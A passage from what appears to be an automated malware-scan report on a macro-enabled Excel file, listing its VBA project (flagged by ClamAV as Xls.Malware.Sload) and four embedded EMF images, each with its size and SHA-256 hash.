  Source: OOXML VBA project: xl/vbaProject.bin
  Size: 76288 bytes
  SHA-256: f20509b3c1968bc32a073271d8711dcdae21c9293159dc5eecaa4da5eda3de9d
  Detection (ClamAV): Xls.Malware.Sload-7135989-0
  Obfuscation or payload: unlikely
  This per-artifact field refers to the vbaProject.bin container; it does not reflect the hex-string obfuscation of the macro source itself, which the OLE_VBA_OBFUSCATED_* heuristics above cover.
emf_00.emf
  Kind: ooxml-emf
  Source: OOXML EMF part: xl/media/image1.emf
  Size: 2696 bytes
  SHA-256: e2b9ab8d21271044aa5cae3db325f7e3199f9ff15b24b1ffd1e19f45509d05e1

emf_01.emf
  Kind: ooxml-emf
  Source: OOXML EMF part: xl/media/image2.emf
  Size: 2048 bytes
  SHA-256: 89b89df4887eb5d2ff6f6b39d81ef17dfd59e319a84f6c1cc58adc1270b7d060

emf_02.emf
  Kind: ooxml-emf
  Source: OOXML EMF part: xl/media/image7.emf
  Size: 2688 bytes
  SHA-256: a36213c0caed53a2fb5bcdcbd0140362f907afbd5da71fa6838cb1966064f0b2

emf_03.emf
  Kind: ooxml-emf
  Source: OOXML EMF part: xl/media/image8.emf
  Size: 2724 bytes
  SHA-256: 72a904759f6d5c892e981abcc8474c9bc548f5f928f6346ed5949212bb3f35a6